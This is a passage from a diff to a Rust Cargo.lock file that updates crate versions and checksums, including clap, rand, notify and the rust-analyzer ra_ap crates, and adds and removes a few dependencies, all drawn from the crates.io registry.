"4.5.26" +version = "4.5.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8eb5e908ef3a6efbe1ed62520fb7287959888c88485abe072543190ecc66783" +checksum = "027bb0d98429ae334a8698531da7077bdf906419543a35a55c2cb1b66437d767" dependencies = [ "clap_builder", "clap_derive", @@ -328,9 +329,9 @@ dependencies = [ [[package]] name = "clap_builder" -version = "4.5.26" +version = "4.5.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96b01801b5fc6a0a232407abc821660c9c6d25a1cafc0d4f85f29fb8d9afc121" +checksum = "5589e0cba072e0f3d23791efac0fd8627b49c829c196a492e88168e6a669d863" dependencies = [ "anstream", "anstyle", 
@@ -340,9 +341,9 @@ dependencies = [ [[package]] name = "clap_derive" -version = "4.5.24" +version = "4.5.28" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "54b755194d6389280185988721fffba69495eed5ee9feeee9a599b53db80318c" +checksum = "bf4ced95c6f4a675af3da73304b9ac4ed991640c36374e4b46795c49e17cf1ed" dependencies = [ "heck 0.5.0", "proc-macro2", @@ -580,9 +581,9 @@ checksum = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813" [[package]] name = "either" -version = "1.13.0" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60b1af1c220855b6ceac025d3f6ecdd2b7c4894bfe9cd9bda4fbb4bc7c0d4cf0" +checksum = "b7914353092ddf589ad78f25c5c1c21b7f80b0ff8621e7c814c3485b5306da9d" [[package]] name = "ena" @@ -590,7 +591,7 @@ version = "0.14.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3d248bdd43ce613d87415282f69b9bb99d947d290b10962dd6c56233312c2ad5" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] @@ -697,9 +698,9 @@ checksum = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80" [[package]] name = "flate2" -version = "1.0.35" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c936bfdafb507ebbf50b8074c54fa31c5be9a1e7e5f467dd659697041407d07c" +checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc" dependencies = [ "crc32fast", "miniz_oxide", @@ -737,13 +738,14 @@ checksum = "7ab85b9b05e3978cc9a9cf8fea7f01b494e1a09ed3037e16ba39edc7a29eb61a" [[package]] name = "getrandom" -version = "0.2.15" +version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7" +checksum = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8" dependencies = [ "cfg-if", "libc", - "wasi", + "wasi 0.13.3+wasi-0.2.2", + "windows-targets 0.52.6", ] [[package]] 
@@ -760,7 +762,7 @@ checksum = "15f1ce686646e7f1e19bf7d5533fe443a45dbfb990e00629110797578b42fb19" dependencies = [ "aho-corasick", "bstr", - "log 0.4.22", + "log 0.4.25", "regex-automata 0.4.9", "regex-syntax 0.8.5", ] @@ -875,11 +877,11 @@ checksum = "c8fae54786f62fb2918dcfae3d568594e50eb9b5c25bf04371af6fe7516452fb" [[package]] name = "inotify" -version = "0.9.6" +version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8069d3ec154eb856955c1c0fbffefbf5f3c40a104ec912d4797314c1801abff" +checksum = "f37dccff2791ab604f9babef0ba14fbe0be30bd368dc541e2b08d07c8aa908f3" dependencies = [ - "bitflags 1.3.2", + "bitflags 2.8.0", "inotify-sys", "libc", ] @@ -983,7 +985,7 @@ version = "0.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "libc", "redox_syscall", ] @@ -1014,14 +1016,14 @@ version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e19e8d5c34a3e0e2223db8e060f9e8264aeeb5c5fc64a4ee9965c062211c024b" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] name = "log" -version = "0.4.22" +version = "0.4.25" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7a70ba024b9dc04c27ea2f0c0548feb474ec5c54bba33a7f72f873a39d07b24" +checksum = "04cbf5b083de1c7e0222a7a51dbfdba1cbe1c6ab0b15e29fff3f6c077fd9cd9f" [[package]] name = "lz4_flex" 
@@ -1055,23 +1057,23 @@ dependencies = [ [[package]] name = "miniz_oxide" -version = "0.8.2" +version = "0.8.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ffbe83022cedc1d264172192511ae958937694cd57ce297164951b8b3568394" +checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5" dependencies = [ "adler2", ] [[package]] name = "mio" -version = "0.8.11" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a4a650543ca06a924e8b371db273b2756685faae30f8487da1b56505a8f78b0c" +checksum = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd" dependencies = [ "libc", - "log 0.4.22", - "wasi", - "windows-sys 0.48.0", + "log 0.4.25", + "wasi 0.11.0+wasi-snapshot-preview1", + "windows-sys 0.52.0", ] [[package]] @@ -1101,23 +1103,29 @@ checksum = "2bf50223579dc7cdcfb3bfcacf7069ff68243f8c363f62ffa99cf000a6b9c451" [[package]] name = "notify" -version = "6.1.1" +version = "8.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6205bd8bb1e454ad2e27422015fb5e4f2bcc7e08fa8f27058670d208324a4d2d" +checksum = "2fee8403b3d66ac7b26aee6e40a897d85dc5ce26f44da36b8b73e987cc52e943" dependencies = [ - "bitflags 2.7.0", - "crossbeam-channel", + "bitflags 2.8.0", "filetime", "fsevent-sys", "inotify", "kqueue", "libc", - "log 0.4.22", + "log 0.4.25", "mio", + "notify-types", "walkdir", - "windows-sys 0.48.0", + "windows-sys 0.59.0", ] +[[package]] +name = "notify-types" +version = "2.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d" + [[package]] name = "nu-ansi-term" version = "0.46.0" 
@@ -1155,9 +1163,9 @@ dependencies = [ [[package]] name = "once_cell" -version = "1.20.2" +version = "1.20.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775" +checksum = "945462a4b81e43c4e3ba96bd7b49d834c6f61198356aa858733bc4acf3cbe62e" [[package]] name = "oorandom" @@ -1273,7 +1281,7 @@ version = "0.2.20" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "77957b295656769bb8ad2b6a6b09d897d94f05c41b069aede1fcdaa675eaea04" dependencies = [ - "zerocopy", + "zerocopy 0.7.35", ] [[package]] @@ -1309,20 +1317,30 @@ dependencies = [ [[package]] name = "ra-ap-rustc_abi" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28b782af0a7a8df16ddf43cd70da9f17bc3b1ce712c9e4992b6edb16f5f53632" +checksum = "3829c3355d1681ffeaf1450ec71edcdace6820fe2e86469d8fc1ad45e2c96460" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", + "ra-ap-rustc_hashes", "ra-ap-rustc_index", "tracing", ] +[[package]] +name = "ra-ap-rustc_hashes" +version = "0.97.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bd4d6d4c434bec08e02370a4f64a4985312097215a62e82d0f757f3a98e502e" +dependencies = [ + "rustc-stable-hash", +] + [[package]] name = "ra-ap-rustc_index" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ce5742f134960482f543b35ecebec3cacc6d79a9a685713518b4d8d70c5f9aa8" +checksum = "bad6fc4bd7522e31096e2de5b0351144fe0684b608791ee26c842bf2da1b19ae" dependencies = [ "ra-ap-rustc_index_macros", "smallvec", 
@@ -1330,9 +1348,9 @@ dependencies = [ [[package]] name = "ra-ap-rustc_index_macros" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7ea011fcf68309a8835ad01d91c032cb18444617b00e2cab21d45b208164441" +checksum = "cfb234e1f84b92be45276c3025bee18789e9bc95bec8789bec961e78edb01c52" dependencies = [ "proc-macro2", "quote", @@ -1341,19 +1359,20 @@ dependencies = [ [[package]] name = "ra-ap-rustc_lexer" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eb76f0a4d4c20859e41f0a23bff0f37ab9ca9171c214a6c7dd72ea69434865dc" +checksum = "7a3a40bd11dc43d1cb110e730b80620cf8102f4cca8920a02b65954da0ed931f" dependencies = [ + "memchr", "unicode-properties", "unicode-xid", ] [[package]] name = "ra-ap-rustc_parse_format" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06080bd35078305421a62da77f3c128482d8d44441b6da8ce9d146d1cd9cdb5b" +checksum = "5feb877478994cb4c0c0c7a5116a352eefc0634aefc8636feb00a893fa5b7135" dependencies = [ "ra-ap-rustc_index", "ra-ap-rustc_lexer", @@ -1361,12 +1380,12 @@ dependencies = [ [[package]] name = "ra-ap-rustc_pattern_analysis" -version = "0.87.0" +version = "0.97.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68a3154fe4c20c177d7b3c678a2d3a97aba0cca156ddef88959915041889daf0" +checksum = "a76774d35934d464c4115908cde16f76a4f7e540fe1eea6b79336c556e37bdd3" dependencies = [ "ra-ap-rustc_index", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "smallvec", "tracing", 
@@ -1374,9 +1393,9 @@ dependencies = [ [[package]] name = "ra_ap_base_db" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "548b95b278a8f6f888a0bb6cb7bf4201fe920d3800cd99770054e5eb72f3cd6a" +checksum = "5d8e4a327f1a8ace5afced54ebaa1a34f8cf0bb535a28aefb8300e8ea49a7d6e" dependencies = [ "la-arena", "lz4_flex", @@ -1387,7 +1406,7 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "semver", "tracing", "triomphe", @@ -1395,30 +1414,31 @@ dependencies = [ [[package]] name = "ra_ap_cfg" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "921e2b0232d1e8352eb9f476bb55c1d8bcbed0531adc17c74aa711fef015c851" +checksum = "4d974450788b1f90243c5f2231875ed4d7087444975c0190a1c2cb02c3ed465d" dependencies = [ "ra_ap_intern", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_edition" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7cc6633305d878cafb4a4482e7e7002d1a5d7b15fa837728b6613ff5336f8a4" +checksum = "c3b1b961a84cb09a4e06e44d06b2e77bcf546d0c2623df9545ba9cc694880989" [[package]] name = "ra_ap_hir" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e3f6b31381a297e5bb4fa76108a2cf7bf8d35067a130f932aa6fdfb733ba3a1" +checksum = "ff0672e35a6cf12333cb6b9e3fd18aba4bc724fa7c7b24c3253df4730be1f9c3" dependencies = [ "arrayvec", "either", + "indexmap 2.7.0", "itertools 0.12.1", "ra_ap_base_db", "ra_ap_cfg", @@ -1430,7 +1450,7 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", 
@@ -1438,12 +1458,12 @@ dependencies = [ [[package]] name = "ra_ap_hir_def" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "84144bdda7af170e660d312982889622f4a5361c1bb74df2afa2a6ce17d48644" +checksum = "fde2fb9361257e31e73e63eb2d07445ea3fd4cd1e7bae7f45e7ba82bcfcde29a" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", "dashmap", "drop_bomb", @@ -1454,18 +1474,18 @@ dependencies = [ "itertools 0.12.1", "la-arena", "ra-ap-rustc_abi", + "ra-ap-rustc_hashes", "ra-ap-rustc_parse_format", "ra_ap_base_db", "ra_ap_cfg", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "smallvec", "text-size", @@ -1475,9 +1495,9 @@ dependencies = [ [[package]] name = "ra_ap_hir_expand" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "441661b394acfa4f3ac4cb54386f8ee8b451504ec167b0bf0e4200da1bbca50d" +checksum = "1823b649710bf1829c894f774dfe66acb33a3e5bc7409ff7836cd19f6e09c250" dependencies = [ "cov-mark", "either", @@ -1487,7 +1507,6 @@ dependencies = [ "ra_ap_base_db", "ra_ap_cfg", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", "ra_ap_parser", "ra_ap_span", @@ -1495,7 +1514,7 @@ dependencies = [ "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1503,12 +1522,12 @@ dependencies = [ [[package]] name = "ra_ap_hir_ty" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6feea30dff289f33a8ed76172ff4cb299db22d224f88735aa2c7f49ba1e5e77f" +checksum = "72a591a02787bd2e938c25fceb1f831d0929b9c08726e6d831f85c4a9fba04b5" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", "chalk-ir", "chalk-recursive", 
@@ -1522,17 +1541,17 @@ dependencies = [ "nohash-hasher", "oorandom", "ra-ap-rustc_abi", + "ra-ap-rustc_hashes", "ra-ap-rustc_index", "ra-ap-rustc_pattern_analysis", "ra_ap_base_db", "ra_ap_hir_def", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "scoped-tls", "smallvec", @@ -1543,12 +1562,12 @@ dependencies = [ [[package]] name = "ra_ap_ide_db" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e33bd5a0139b6c74d34ed963494115abe3f9c95cf5936871ab3d9b548ccbbdf" +checksum = "c74386061453edc3ebfd52141c7c3cde109a7427faff9792a303c3c09a762a01" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", "crossbeam-channel", "either", 
@@ -1560,42 +1579,34 @@ dependencies = [ "nohash-hasher", "ra_ap_base_db", "ra_ap_hir", - "ra_ap_limit", "ra_ap_parser", "ra_ap_profile", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", "triomphe", ] [[package]] name = "ra_ap_intern" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "faa7ee24ae9bf4d2536ef7fb6de35f30856edbf7b3d6ac02e5a2532118896569" +checksum = "8239ffde688b558a4335f03d14fa42dcebb203f452367830554b18e17ff1c683" dependencies = [ "dashmap", "hashbrown 0.14.5", - "rustc-hash 2.1.0", - "sptr", + "rustc-hash 2.1.1", "triomphe", ] -[[package]] -name = "ra_ap_limit" -version = "0.0.258" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90d8a2aecbd488cf79b430bd5abe6650da44ae58b31cd6052c909dbd3f5d5926" - [[package]] name = "ra_ap_load-cargo" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e2372aadd32e85460de595891c8b3562126166bc94fdc24508d6784c9d93357" +checksum = "01dd50ca287042b06ca3cc62b60e6891bacee3886d39381d26f9f966e509b1c7" dependencies = [ "anyhow", "crossbeam-channel", @@ -1615,9 +1626,9 @@ dependencies = [ [[package]] name = "ra_ap_mbe" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf69ba82adb6e436617ecd09c0ff58006f376060dff437eb9fd383c2983f6d01" +checksum = "c193592a0d1dcd315cf8c60f25d37a15c6b50c2b58bfbc6eac38b123e45c8c21" dependencies = [ "arrayvec", "cov-mark", 
@@ -1629,38 +1640,37 @@ dependencies = [ "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", ] [[package]] name = "ra_ap_parser" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8f499b6c33a588d60ed9722d057954a21ec01913b97a5693ff40ba4828ffa7b9" +checksum = "b380f96951dd56b8231eeb47884fea12c57b8515ac748eedd590b26cd156681c" dependencies = [ "drop_bomb", "ra-ap-rustc_lexer", "ra_ap_edition", - "ra_ap_limit", "tracing", ] [[package]] name = "ra_ap_paths" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5a16df131fa641a4af4d9488152b7b332a6a30e93bc655fdbe88f555ba28825" +checksum = "0801105582f532bc59a2b5714a30966c4cf9bd3e5b66f4161763c1d974d2c7d5" dependencies = [ "camino", ] [[package]] name = "ra_ap_proc_macro_api" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3480e0d07197ebcc2db5836b0c39625e07b0d77c6471a2a748e5bdf54ce556e3" +checksum = "da377b243e376b82819f875c1c6624125d27b682a740bd4cafc30b4f496d0ffa" dependencies = [ "indexmap 2.7.0", "ra_ap_intern", @@ -1668,7 +1678,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "serde", "serde_derive", "serde_json", 
@@ -1677,21 +1687,21 @@ dependencies = [ [[package]] name = "ra_ap_profile" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95b707dd9c92139030587d81b3333428f48af8f4728330ed12101ab0bb431d72" +checksum = "4d6d1391bee4f86e56385438a2dcb739cbb96bd0fbf49799a492332d57e6db62" dependencies = [ "cfg-if", "libc", "perf-event", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_project_model" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "551a0de5a16f0538fbaf401a319d81d1a034f7aa014e46ac87c5bd74229a211b" +checksum = "e8b1ac2712d5f6a20197b360890031e64b4ea097b511f50e2cb8ab1a0e24f577" dependencies = [ "anyhow", "cargo_metadata", @@ -1704,7 +1714,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_toolchain", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "semver", "serde", "serde_derive", @@ -1715,9 +1725,9 @@ dependencies = [ [[package]] name = "ra_ap_salsa" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ec0c82d9e5affbf7d582750b301d279589787a5ac729f95756f5a0b0bf2b4a4" +checksum = "bc3a0a272f50e2ab831452bd3f4e7f8a571ccf01282d76f4a078f661135ed0ce" dependencies = [ "indexmap 2.7.0", "itertools 0.12.1", @@ -1725,7 +1735,7 @@ dependencies = [ "oorandom", "parking_lot", "ra_ap_salsa-macros", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1733,9 +1743,9 @@ dependencies = [ [[package]] name = "ra_ap_salsa-macros" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8440192eb549dda1cdefc95eaa1fc42ad13cfbd303add757517d77c81e7dc2e1" +checksum = "d5d59b47a54fd5468ce0dc03b146afd0932ae0f3d05a5c15ca78d29d5e85bc31" dependencies = [ "heck 0.4.1", "proc-macro2", 
@@ -1745,9 +1755,9 @@ dependencies = [ [[package]] name = "ra_ap_span" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18690685d10da2577d7821d46c0de5a884bf1755e59635cbb1a795451e2a4acc" +checksum = "f10dbdd611d2546be7c400934007865e85bb37570566c715edb3aac76367a782" dependencies = [ "hashbrown 0.14.5", "la-arena", @@ -1755,15 +1765,15 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "text-size", ] [[package]] name = "ra_ap_stdx" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4016934faae8413b4ad3f1bf063c7ffccdcfdf3f67ff32f4a79a197a3c1cb0da" +checksum = "b7d5c58fcda9b35d61e23f334b2b11221abf53e7f5e4344fc7eb1de18b2cbf68" dependencies = [ "always-assert", "crossbeam-channel", @@ -1771,14 +1781,14 @@ dependencies = [ "jod-thread", "libc", "miow", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_syntax" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e8e381d21d166d12b11906171f82382473d60abfead0c4acc6d7d07150f87f73" +checksum = "75334f45a8095223823ef1d2789c085460b7b9368c63a6430d46f6f2b9bd5cb5" dependencies = [ "cov-mark", "either", @@ -1788,7 +1798,7 @@ dependencies = [ "ra_ap_parser", "ra_ap_stdx", "rowan", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smol_str", "tracing", "triomphe", @@ -1796,9 +1806,9 @@ dependencies = [ [[package]] name = "ra_ap_syntax-bridge" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "65f1960218acd2ed8e486e7bd24f80a7eb89591906c6b0831296b2a75c556b2f" +checksum = "b331a50f90ae587d230b1b55b3852ebf67ab740dec33c1a4b0900005037e77c2" dependencies = [ "ra_ap_intern", "ra_ap_parser", 
@@ -1806,15 +1816,15 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_toolchain" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c9195f69ff02f076f5a726c7fbafa2b4639d00235906cb44e52ca75cd8b33c30" +checksum = "8d56e1b3a34eac0448e54afccf63a6b7699ef14a734b2f1b340246ccdd00c0d3" dependencies = [ "camino", "home", @@ -1822,9 +1832,9 @@ dependencies = [ [[package]] name = "ra_ap_tt" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ac261d79d3ec475a1f3b2a758d3e466f2b9d7d883fb72239b06979bf6880018" +checksum = "4b974b1211e0b1e17e44b1f256ca1b4a3734d4d98f43ba09ee0a8476fc3a5b83" dependencies = [ "arrayvec", "ra-ap-rustc_lexer", @@ -1835,9 +1845,9 @@ dependencies = [ [[package]] name = "ra_ap_vfs" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee35a171beccbb01b4ede1d9ad91dee487a3742d7cc39efd7aed6961027cbe78" +checksum = "2b004e20f901dae213cb1673111a2b56fec4f0d1c4c894b62668a0f69ce25065" dependencies = [ "crossbeam-channel", "fst", @@ -1845,15 +1855,15 @@ dependencies = [ "nohash-hasher", "ra_ap_paths", "ra_ap_stdx", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_vfs-notify" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b234b7651eb5d61f18d4f4643590bb8b1fd59ef766a1059741c09c540ec8cd86" +checksum = "95f9e8df03407d76e044f99ef45fafd686d775508aa7d1ba836e9eca58b833a3" dependencies = [ "crossbeam-channel", "notify", 
@@ -1861,27 +1871,27 @@ dependencies = [ "ra_ap_stdx", "ra_ap_vfs", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", "walkdir", ] [[package]] name = "rand" -version = "0.8.5" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +checksum = "3779b94aeb87e8bd4e834cee3650289ee9e0d5677f976ecdb6d219e5f4f6cd94" dependencies = [ - "libc", "rand_chacha", "rand_core", + "zerocopy 0.8.20", ] [[package]] name = "rand_chacha" -version = "0.3.1" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" +checksum = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb" dependencies = [ "ppv-lite86", "rand_core", @@ -1889,11 +1899,12 @@ dependencies = [ [[package]] name = "rand_core" -version = "0.6.4" +version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" +checksum = "7a509b1a2ffbe92afab0e55c8fd99dea1c280e8171bd2d88682bb20bc41cbc2c" dependencies = [ "getrandom", + "zerocopy 0.8.20", ] [[package]] @@ -1922,7 +1933,7 @@ version = "0.5.8" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "03a862b389f93e68874fbf580b9de08dd02facb9a788ebadaf4a3fd33cf58834" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", ] [[package]] 
@@ -1998,9 +2009,15 @@ checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" [[package]] name = "rustc-hash" -version = "2.1.0" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7fb8039b3032c191086b10f11f319a6e99e1e82889c5cc6046f515c9db1d497" +checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" + +[[package]] +name = "rustc-stable-hash" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2febf9acc5ee5e99d1ad0afcdbccc02d87aa3f857a1f01f825b80eacf8edfcd1" [[package]] name = "rustc_apfloat" @@ -2013,9 +2030,9 @@ dependencies = [ [[package]] name = "ryu" -version = "1.0.18" +version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f" +checksum = "6ea1a2d0a644769cc99faa24c3ad26b379b786fe7c36fd3c546254801650e6dd" [[package]] name = "same-file" @@ -2049,18 +2066,18 @@ dependencies = [ [[package]] name = "serde" -version = "1.0.217" +version = "1.0.218" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70" +checksum = "e8dfc9d19bdbf6d17e22319da49161d5d0108e4188e8b680aef6299eed22df60" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" -version = "1.0.217" +version = "1.0.218" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0" +checksum = "f09503e191f4e797cb8aac08e9a4a4695c5edf6a2e70e376d961ddd5c969f82b" dependencies = [ "proc-macro2", "quote", 
@@ -2069,9 +2086,9 @@ dependencies = [ [[package]] name = "serde_json" -version = "1.0.135" +version = "1.0.139" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9" +checksum = "44f86c3acccc9c65b153fe1b85a3be07fe5515274ec9f0653b4a0875731c72a6" dependencies = [ "itoa", "memchr", @@ -2148,9 +2165,9 @@ checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" [[package]] name = "smallvec" -version = "1.13.2" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c5e1a9a646d36c3599cd173a41282daf47c44583ad367b8e6837255952e5c67" +checksum = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd" [[package]] name = "smol_str" @@ -2162,12 +2179,6 @@ dependencies = [ "serde", ] -[[package]] -name = "sptr" -version = "0.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a" - [[package]] name = "stable_deref_trait" version = "1.2.0" @@ -2188,9 +2199,9 @@ checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f" [[package]] 